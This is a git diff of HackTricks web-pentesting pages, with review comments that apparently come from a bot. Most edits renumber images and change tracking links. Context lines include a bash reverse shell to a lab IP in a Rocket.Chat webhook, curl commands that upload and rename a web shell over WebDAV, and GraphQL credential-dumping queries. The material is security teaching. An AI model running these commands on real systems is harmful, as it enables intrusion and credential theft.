{% embed url="https://github.com/electron/electron/blob/664c184fcb98bb5b4b6b569553e7f7339d3ba4c5/lib/common/asar.js#L30-L36" %}
-![](<../../../.gitbook/assets/image (1067).png>)
+![](<../../../.gitbook/assets/image (1070).png>)
https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/bin/events.js#L156-L231 -- No longer exists
Then it goes here:
-![](<../../../.gitbook/assets/image (790).png>)
+![](<../../../.gitbook/assets/image (793).png>)
Where "self" is Node's process object:
-![](<../../../.gitbook/assets/image (697).png>)
+![](<../../../.gitbook/assets/image (700).png>)
The process object has a references to "require" function:
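Review bot: the context keeps a bare URL to `bin/events.js#L156-L231` with the annotation "-- No longer exists", so the walkthrough points at code the reader cannot open. The link already pins a commit hash, so check whether the file path is correct. Then either replace it with a working permalink or describe the referenced lines in a sentence and drop the dead link. "has a references to" in the last line should be "has a reference to".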
@@ -64,11 +64,11 @@ Get **require object from prototype pollution**. From [https://www.youtube.com/w
Leak:
-
+
Exploit:
-
+
diff --git a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md
index 1241e157c..603f0c114 100644
--- a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md
+++ b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md
@@ -22,7 +22,7 @@ If the preload script exposes an IPC endpoint from the main.js file, the rendere
Example from [https://speakerdeck.com/masatokinugawa/how-i-hacked-microsoft-teams-and-got-150000-dollars-in-pwn2own?slide=21](https://speakerdeck.com/masatokinugawa/how-i-hacked-microsoft-teams-and-got-150000-dollars-in-pwn2own?slide=21) (you have the full example of how MS Teams was abusing from XSS to RCE in those slides, this is just a very basic example):
-
+
## Example 1
diff --git a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md
index ecc4da8c8..60e4b34d5 100644
--- a/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md
+++ b/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md
@@ -20,7 +20,7 @@ Example from [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-o
This code open http(s) links with default browser:
-![](<../../../.gitbook/assets/image (765).png>)
+![](<../../../.gitbook/assets/image (768).png>)
Something like `file:///C:/Windows/systemd32/calc.exe` could be used to execute a calc, the `SAFE_PROTOCOLS.indexOf` is preventing it.
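Review bot: the example path in the last context line is `file:///C:/Windows/systemd32/calc.exe`. "systemd32" is a typo for `System32`, so the example as written names a directory that does not exist. The sentence also joins two statements with a comma. Split it so it is clear that the `SAFE_PROTOCOLS.indexOf` check is what blocks the `file://` URL.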
diff --git a/network-services-pentesting/pentesting-web/flask.md b/network-services-pentesting/pentesting-web/flask.md
index 601bd1237..794ef4b6c 100644
--- a/network-services-pentesting/pentesting-web/flask.md
+++ b/network-services-pentesting/pentesting-web/flask.md
@@ -14,12 +14,12 @@ Other ways to support HackTricks:
-
+
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=flask) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=flask" %}
**Probably if you are playing a CTF a Flask application will be related to** [**SSTI**](../../pentesting-web/ssti-server-side-template-injection/)**.**
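Review bot: The two replacement URLs in this hunk do not carry the same parameters: the markdown link uses `utm_medium=text` and adds `utm_term=trickest`, while the `{% embed %}` URL keeps `utm_medium=banner` and has no `utm_term`. If that split is intentional it deserves a line in the commit message, otherwise align them. The markdown link also keeps the escaped form (`utm\_source`, `\&`) while the same link in put-method-webdav.md is written unescaped in this patch, so pick one style. These tracking changes are unrelated to the image renumbering and would be easier to review as a separate commit.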
@@ -118,12 +118,12 @@ app.run(host='0.0.0.0', port=8080)
Could allow to introduce something like "@attacker.com" in order to cause a **SSRF**.
-
+
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=flask) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=flask" %}
diff --git a/network-services-pentesting/pentesting-web/graphql.md b/network-services-pentesting/pentesting-web/graphql.md
index ef3c8b7d8..0de5e9784 100644
--- a/network-services-pentesting/pentesting-web/graphql.md
+++ b/network-services-pentesting/pentesting-web/graphql.md
@@ -63,7 +63,7 @@ query={__schema{types{name,fields{name}}}}
With this query you will find the name of all the types being used:
-![](<../../.gitbook/assets/image (1033).png>)
+![](<../../.gitbook/assets/image (1036).png>)
{% code overflow="wrap" %}
```bash
@@ -73,7 +73,7 @@ query={__schema{types{name,fields{name,args{name,description,type{name,kind,ofTy
With this query you can extract all the types, it's fields, and it's arguments (and the type of the args). This will be very useful to know how to query the database.
-![](<../../.gitbook/assets/image (947).png>)
+![](<../../.gitbook/assets/image (950).png>)
**Errors**
@@ -85,7 +85,7 @@ It's interesting to know if the **errors** are going to be **shown** as they wil
?query={thisdefinitelydoesnotexist}
```
-![](<../../.gitbook/assets/image (413).png>)
+![](<../../.gitbook/assets/image (416).png>)
**Enumerate Database Schema via Introspection**
@@ -191,7 +191,7 @@ Inline introspection query:
The last code line is a graphql query that will dump all the meta-information from the graphql (objects names, parameters, types...)
-![](<../../.gitbook/assets/image (360).png>)
+![](<../../.gitbook/assets/image (363).png>)
If introspection is enabled you can use [**GraphQL Voyager**](https://github.com/APIs-guru/graphql-voyager) to view in a GUI all the options.
@@ -215,7 +215,7 @@ query={flags{name, value}}
Note that in case the **object to query** is a **primitive** **type** like **string** like in the following example
-![](<../../.gitbook/assets/image (955).png>)
+![](<../../.gitbook/assets/image (958).png>)
You can just query is with:
@@ -226,11 +226,11 @@ query={hiddenFlags}
In another example where there were 2 objects inside the "_Query_" type object: "_user_" and "_users_".\
If these objects don't need any argument to search, could **retrieve all the information from them** just **asking** for the data you want. In this example from Internet you could extract the saved usernames and passwords:
-![](<../../.gitbook/assets/image (877).png>)
+![](<../../.gitbook/assets/image (880).png>)
However, in this example if you try to do so you get this **error**:
-![](<../../.gitbook/assets/image (1039).png>)
+![](<../../.gitbook/assets/image (1042).png>)
Looks like somehow it will search using the "_**uid**_" argument of type _**Int**_.\
Anyway, we already knew that, in the [Basic Enumeration](graphql.md#basic-enumeration) section a query was purposed that was showing us all the needed information: `query={__schema{types{name,fields{name, args{name,description,type{name, kind, ofType{name, kind}}}}}}}`
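Review bot: Both images renumbered here (877 to 880, 1039 to 1042) carry information the prose depends on, and both have empty alt text: "you get this **error**:" is followed only by a screenshot, so the error message is not searchable and a wrong renumbering would go unnoticed. Consider adding the error text as a code block or at least descriptive alt text. In the last context line, "a query was purposed" should read "proposed".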
@@ -240,11 +240,11 @@ If you read the image provided when I run that query you will see that "_**user*
So, performing some light _**uid**_ bruteforce I found that in _**uid**=**1**_ a username and a password was retrieved:\
`query={user(uid:1){user,password}}`
-![](<../../.gitbook/assets/image (87).png>)
+![](<../../.gitbook/assets/image (90).png>)
Note that I **discovered** that I could ask for the **parameters** "_**user**_" and "_**password**_" because if I try to look for something that doesn't exist (`query={user(uid:1){noExists}}`) I get this error:
-![](<../../.gitbook/assets/image (704).png>)
+![](<../../.gitbook/assets/image (707).png>)
And during the **enumeration phase** I discovered that the "_**dbuser**_" object had as fields "_**user**_" and "_**password**_.
@@ -386,7 +386,7 @@ Authentication through GraphQL API with **simultaneously sending many queries wi
Below you can find the simplest demonstration of an application authentication request, with **3 different email/passwords pairs at a time**. Obviously it’s possible to send thousands in a single request in the same way:
-![](<../../.gitbook/assets/image (1078).png>)
+![](<../../.gitbook/assets/image (1081).png>)
As we can see from the response screenshot, the first and the third requests returned _null_ and reflected the corresponding information in the _error_ section. The **second mutation had the correct authentication** data and the response has the correct authentication session token.
diff --git a/network-services-pentesting/pentesting-web/h2-java-sql-database.md b/network-services-pentesting/pentesting-web/h2-java-sql-database.md
index 59cf13575..e3a30439e 100644
--- a/network-services-pentesting/pentesting-web/h2-java-sql-database.md
+++ b/network-services-pentesting/pentesting-web/h2-java-sql-database.md
@@ -20,11 +20,11 @@ Official page: [https://www.h2database.com/html/main.html](https://www.h2databas
You can indicate a **non-existent name a of database** in order to **create a new database without valid credentials** (**unauthenticated**):
-![](<../../.gitbook/assets/image (128).png>)
+![](<../../.gitbook/assets/image (131).png>)
Or if you know that for example a **mysql is running** and you know the **database name** and the **credentials** for that database, you can just access it:
-![](<../../.gitbook/assets/image (198).png>)
+![](<../../.gitbook/assets/image (201).png>)
_**Trick from box Hawk of HTB.**_
diff --git a/network-services-pentesting/pentesting-web/iis-internet-information-services.md b/network-services-pentesting/pentesting-web/iis-internet-information-services.md
index d7f997439..9031dd502 100644
--- a/network-services-pentesting/pentesting-web/iis-internet-information-services.md
+++ b/network-services-pentesting/pentesting-web/iis-internet-information-services.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
----
+***
Test executable file extensions:
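Review bot: The switch of the horizontal rule from `----` to `***` is a formatting change unrelated to the rest of this file's edits. Either drop it from this patch or apply the same rule style across the repository in its own commit, so the asset renumbering stays mechanical and easy to verify.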
@@ -238,7 +238,7 @@ The main limitation of this technique if the server is vulnerable is that **it c
You can use [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) to test for this vulnerability:`java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`
-![](<../../.gitbook/assets/image (841).png>)
+![](<../../.gitbook/assets/image (844).png>)
Original research: [https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf](https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf)
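Review bot: The context line above the renumbered image glues the command to the sentence with no space after the colon ("vulnerability:`java -jar ...`") and hard-codes what looks like a lab target URL. Moving the command into its own fenced block with a placeholder host would read better and match how the other pages in this patch present commands. The image change itself (841 to 844) again has no alt text to check against.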
@@ -300,7 +300,7 @@ HTTP/1.1 200 OK
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
diff --git a/network-services-pentesting/pentesting-web/jira.md b/network-services-pentesting/pentesting-web/jira.md
index b402d101d..60b79b2b5 100644
--- a/network-services-pentesting/pentesting-web/jira.md
+++ b/network-services-pentesting/pentesting-web/jira.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -80,7 +80,7 @@ curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"h
* [https://github.com/0x48piraj/Jiraffe](https://github.com/0x48piraj/Jiraffe)
* [https://github.com/bcoles/jira\_scan](https://github.com/bcoles/jira\_scan)
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/network-services-pentesting/pentesting-web/jsp.md b/network-services-pentesting/pentesting-web/jsp.md
index 27c6861d2..664a5018e 100644
--- a/network-services-pentesting/pentesting-web/jsp.md
+++ b/network-services-pentesting/pentesting-web/jsp.md
@@ -24,7 +24,7 @@ Info from [here](https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipu
Accessing that web you may change all the links to request the information to _**rakeshmane.com**_:
-![](<../../.gitbook/assets/image (323).png>)
+![](<../../.gitbook/assets/image (326).png>)
diff --git a/network-services-pentesting/pentesting-web/laravel.md b/network-services-pentesting/pentesting-web/laravel.md
index a3ba23e34..329dda572 100644
--- a/network-services-pentesting/pentesting-web/laravel.md
+++ b/network-services-pentesting/pentesting-web/laravel.md
@@ -19,7 +19,7 @@
If Laravel is in **debugging mode** you will be able to access the **code** and **sensitive data**.\
For example `http://127.0.0.1:8000/profiles`:
-![](<../../.gitbook/assets/image (1043).png>)
+![](<../../.gitbook/assets/image (1046).png>)
This is usually needed for exploiting other Laravel RCE CVEs.
diff --git a/network-services-pentesting/pentesting-web/moodle.md b/network-services-pentesting/pentesting-web/moodle.md
index 46237dc7a..918bd06a9 100644
--- a/network-services-pentesting/pentesting-web/moodle.md
+++ b/network-services-pentesting/pentesting-web/moodle.md
@@ -92,7 +92,7 @@ I found that the automatic tools are pretty **useless finding vulnerabilities af
You need to have **manager** role and you **can install plugins** inside the **"Site administration"** tab\*\*:\*\*
-![](<../../.gitbook/assets/image (627).png>)
+![](<../../.gitbook/assets/image (630).png>)
If you are manager you may still need to **activate this option**. You can see how ins the moodle privilege escalation PoC: [https://github.com/HoangKien1020/CVE-2020-14321](https://github.com/HoangKien1020/CVE-2020-14321).
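Review bot: The first context line ends with `tab\*\*:\*\*`, which renders as literal asterisks around the colon; it looks like a broken bold marker and should be reduced to a plain colon. The last context line has "You can see how ins the moodle", where "in" is meant. Neither is introduced by this patch, but both sit next to the changed image line and are cheap to fix in the same pass.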
diff --git a/network-services-pentesting/pentesting-web/nginx.md b/network-services-pentesting/pentesting-web/nginx.md
index 637af7549..cfb893dc1 100644
--- a/network-services-pentesting/pentesting-web/nginx.md
+++ b/network-services-pentesting/pentesting-web/nginx.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
@@ -315,7 +315,7 @@ Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulne
* [**http://blog.zorinaq.com/nginx-resolver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/)
* [**https://github.com/yandex/gixy/issues/115**](https://github.com/yandex/gixy/issues/115)
-
+
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/README.md b/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
index 349e47107..340cc9151 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
{% embed url="https://websec.nl/" %}
@@ -46,7 +46,7 @@ If `==` is used in PHP, then there are unexpected cases where the comparison doe
PHP comparison tables: [https://www.php.net/manual/en/types.comparisons.php](https://www.php.net/manual/en/types.comparisons.php)
-![](<../../../.gitbook/assets/image (564).png>)
+![](<../../../.gitbook/assets/image (567).png>)
{% file src="../../../.gitbook/assets/EN-PHP-loose-comparison-Type-Juggling-OWASP (1).pdf" %}
@@ -138,7 +138,7 @@ From: [https://medium.com/bugbountywriteup/solving-each-and-every-fb-ctf-challen
Trick from: [https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223](https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223) and [https://mizu.re/post/pong](https://mizu.re/post/pong)
-
+
In short the problem happens because the `preg_*` functions in PHP builds upon the [PCRE library](http://www.pcre.org/). In PCRE certain regular expressions are matched by using a lot of recursive calls, which uses up a lot of stack space. It is possible to set a limit on the amount of recursions allowed, but in PHP this limit [defaults to 100.000](http://php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit) which is more than fits in the stack.
@@ -213,7 +213,7 @@ True
If a **PHP page is printing errors and echoing back some input provided by the user**, the user can make the PHP server print back some **content long enough** so when it tries to **add the headers** into the response the server will throw and error.\
In the following scenario the **attacker made the server throw some big errors**, and as you can see in the screen when php tried to **modify the header information, it couldn't** (so for example the CSP header wasn't sent to the user):
-![](<../../../.gitbook/assets/image (1082).png>)
+![](<../../../.gitbook/assets/image (1085).png>)
## Code execution
@@ -463,7 +463,7 @@ $_=$$____;
$___($_[_]); // ASSERT($_POST[_]);
```
-
+
{% embed url="https://websec.nl/" %}
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md
index 8ac8e584b..f08ed09ab 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md
@@ -115,7 +115,7 @@ Both configuration can be seen in the output of **`phpinfo()`**:
![](https://0xrick.github.io/images/hackthebox/kryptos/17.png)
-![](<../../../../.gitbook/assets/image (490).png>)
+![](<../../../../.gitbook/assets/image (493).png>)
## open\_basedir Bypass
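Review bot: The image on the line above the renumbered one is hotlinked from a third-party site (`https://0xrick.github.io/images/hackthebox/kryptos/17.png`) while its neighbour lives in `.gitbook/assets`. Since this pass is reorganising assets anyway, consider copying that image into the repository so the page does not depend on an external host staying online and serving the same content.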
@@ -152,9 +152,9 @@ foreach($file_list as $f){
If you want to **learn more about PHP-FPM and FastCGI** you can read the [first section of this page](disable\_functions-bypass-php-fpm-fastcgi.md).\
If **`php-fpm`** is configured you can abuse it to completely bypass **open\_basedir**:
-![](<../../../../.gitbook/assets/image (542).png>)
+![](<../../../../.gitbook/assets/image (545).png>)
-![](<../../../../.gitbook/assets/image (574).png>)
+![](<../../../../.gitbook/assets/image (577).png>)
Note that the first thing you need to do is find where is the **unix socket of php-fpm**. It use to be under `/var/run` so you can **use the previous code to list the directory and find it**.\
Code from [here](https://balsn.tw/ctf\_writeup/20190323-0ctf\_tctf2019quals/#wallbreaker-easy).
diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md
index 9bee8c401..1c66c5616 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md
@@ -48,7 +48,7 @@ I'm not sure if this is working in modern versions because I tried once and it d
Using [Gopherus](https://github.com/tarunkant/Gopherus) you can generate a payload to send to the FastCGI listener and execute arbitrary commands:
-![](<../../../../.gitbook/assets/image (224).png>)
+![](<../../../../.gitbook/assets/image (227).png>)
Then, you can grab the urlencoded payload and decode it and transform to base64, \[**using this recipe of cyberchef for example**]\([http://icyberchef.com/#recipe=URL\_Decode%28%29To\_Base64%28'A-Za-z0-9%2B/%3D'%29\&input=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](http://icyberchef.com/#recipe=URL\_Decode%28%29To\_Base64%28'A-Za-z0-9%2B/%3D'%29\&input=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)). And then copy/pasting the abse64 in this php code:
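Review bot: The CyberChef link in the trailing context line is broken markdown: the opening bracket and the parenthesis are escaped (`\[` and `]\(`), so it renders as literal text with a nested link inside instead of a single link. Unescape them so the bold text is the link label. The same line has "abse64" for "base64".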
@@ -420,9 +420,9 @@ echo $client->request($params, $code)."\n";
Using the previous function you will see that the function **`system`** is **still disabled** but **`phpinfo()`** shows a **`disable_functions`** **empty**:
-![](<../../../../.gitbook/assets/image (185).png>)
+![](<../../../../.gitbook/assets/image (188).png>)
-![](<../../../../.gitbook/assets/image (710).png>)
+![](<../../../../.gitbook/assets/image (713).png>)
**So, I think that you can only set `disable_functions` via php `.ini` config files and the PHP\_VALUE won't override that setting.**
@@ -435,7 +435,7 @@ You can access it here: [https://github.com/w181496/FuckFastcgi](https://github.
You will find that the exploit is very similar to the previous code, but instead of trying to bypass `disable_functions` using PHP\_VALUE, it tries to **load an external PHP module** to execute code using the parameters `extension_dir` and `extension` inside the variable `PHP_ADMIN_VALUE`.\
**NOTE1**: You probably will need to **recompile** the extension with the **same PHP version that the server** is using (you can check it inside the output of phpinfo):
-![](<../../../../.gitbook/assets/image (177).png>)
+![](<../../../../.gitbook/assets/image (180).png>)
{% hint style="danger" %}
**NOTE2**: I managed to make this work by inserting the `extension_dir` and `extension` values inside a PHP `.ini` config file (something that you won't be able to do attacking a server). But for some reason, when using this exploit and loading the extension from the `PHP_ADMIN_VALUE` variable the process just died, so I don't know if this technique is still valid.
diff --git a/network-services-pentesting/pentesting-web/put-method-webdav.md b/network-services-pentesting/pentesting-web/put-method-webdav.md
index aa39f95fc..b04fbcb8a 100644
--- a/network-services-pentesting/pentesting-web/put-method-webdav.md
+++ b/network-services-pentesting/pentesting-web/put-method-webdav.md
@@ -1,12 +1,12 @@
# WebDav
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=put-method-webdav) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %}
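Review bot: The new markdown link in this hunk has no `utm_term=trickest`, while the equivalent links added to flask.md, web-api-pentesting.md and wordpress.md in this patch all include it. It is also written unescaped here but escaped (`utm\_source`, `\&`) in flask.md and web-api-pentesting.md. If the parameters are meant to be uniform across pages, add the missing term and settle on one escaping style; the same applies to the two other copies of this banner further down in this file.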
@@ -43,7 +43,7 @@ davtest [-auth user:password] -sendbd auto -url http:// #Try to upload every
Output sample:
-![](<../../.gitbook/assets/image (848).png>)
+![](<../../.gitbook/assets/image (851).png>)
This doesn't mean that **.txt** and **.html extensions are being executed**. This mean that you can **access this files** through the web.
@@ -67,13 +67,13 @@ curl -T 'shell.txt' 'http://$ip'
curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'
```
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=put-method-webdav) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %}
## IIS5/6 WebDav Vulnerability
@@ -81,7 +81,7 @@ This vulnerability is very interesting. The **WebDav** does **not allow** to **u
Then you can **upload** your shell as a ".**txt" file** and **copy/move it to a ".asp;.txt"** file. An accessing that file through the web server, it will be **executed** (cadaver will said that the move action didn't work, but it did).
-![](<../../.gitbook/assets/image (1089).png>)
+![](<../../.gitbook/assets/image (1092).png>)
## Post credentials
@@ -139,10 +139,10 @@ Other ways to support HackTricks:
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=put-method-webdav) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %}
diff --git a/network-services-pentesting/pentesting-web/rocket-chat.md b/network-services-pentesting/pentesting-web/rocket-chat.md
index 1687249ce..40d929cfa 100644
--- a/network-services-pentesting/pentesting-web/rocket-chat.md
+++ b/network-services-pentesting/pentesting-web/rocket-chat.md
@@ -14,11 +14,10 @@ Other ways to support HackTricks:
-
+
{% embed url="https://websec.nl/" %}
-
## RCE
If you are admin inside Rocket Chat you can get RCE.
@@ -26,7 +25,7 @@ If you are admin inside Rocket Chat you can get RCE.
* Got to **`Integrations`** and select **`New Integration`** and choose any: **`Incoming WebHook`** or **`Outgoing WebHook`**.
* `/admin/integrations/incoming`
-
+
* According to the [docs](https://docs.rocket.chat/guides/administration/admin-panel/integrations), both use ES2015 / ECMAScript 6 ([basically JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) to process the data. So lets get a [rev shell for javascript](../../generic-methodologies-and-resources/shells/linux.md#nodejs) like:
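Review bot: The first list item in this hunk reads "Got to **`Integrations`**" where "Go to" is meant. It is a context line, but it is the first step of the procedure and worth correcting while the surrounding figure lines are being rewritten.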
@@ -38,21 +37,20 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
* Configure the WebHook (the channel and post as username must exists):
-
+
* Configure WebHook script:
-
+
* Save changes
* Get the generated WebHook URL:
-
+
* Call it with curl and you shuold receive the rev shell
-
-
+
{% embed url="https://websec.nl/" %}
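Review bot: Two typos remain in the steps this hunk reflows: "the channel and post as username must exists" should be "must exist", and "you shuold receive" should be "should". The hunk also removes the blank lines before `## RCE` and after the last step (21 lines down to 20), so check that the list and the following embed still render as separate blocks in GitBook.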
diff --git a/network-services-pentesting/pentesting-web/spring-actuators.md b/network-services-pentesting/pentesting-web/spring-actuators.md
index 2dc78e158..014e8abc3 100644
--- a/network-services-pentesting/pentesting-web/spring-actuators.md
+++ b/network-services-pentesting/pentesting-web/spring-actuators.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
## **Spring Auth Bypass**
-
+
**From** [**https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png**](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png)\*\*\*\*
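Review bot: The attribution line ends with `\*\*\*\*`, four escaped asterisks that render literally after the link. It looks like leftover bold markup from an earlier conversion; remove it so the line ends at the closing parenthesis.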
diff --git a/network-services-pentesting/pentesting-web/tomcat/README.md b/network-services-pentesting/pentesting-web/tomcat/README.md
index c3b4cbce3..fb9e6c5fa 100644
--- a/network-services-pentesting/pentesting-web/tomcat/README.md
+++ b/network-services-pentesting/pentesting-web/tomcat/README.md
@@ -25,7 +25,7 @@
* It usually runs on **port 8080**
* **Common Tomcat error:**
-
+
## Enumeration
diff --git a/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md b/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md
index 152f2d797..66896b119 100644
--- a/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md
+++ b/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
{% embed url="https://websec.nl/" %}
@@ -34,7 +34,7 @@ msf> auxiliary/scanner/vmware/vmware_http_login
If you find valid credentials, you can use more metasploit scanner modules to obtain information.
-
+
{% embed url="https://websec.nl/" %}
diff --git a/network-services-pentesting/pentesting-web/web-api-pentesting.md b/network-services-pentesting/pentesting-web/web-api-pentesting.md
index 8e7e2491e..383bb9499 100644
--- a/network-services-pentesting/pentesting-web/web-api-pentesting.md
+++ b/network-services-pentesting/pentesting-web/web-api-pentesting.md
@@ -14,12 +14,12 @@ Other ways to support HackTricks:
-
+
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=web-api-pentesting) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=web-api-pentesting" %}
## API Pentesting Methodology Summary
@@ -72,12 +72,12 @@ kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0
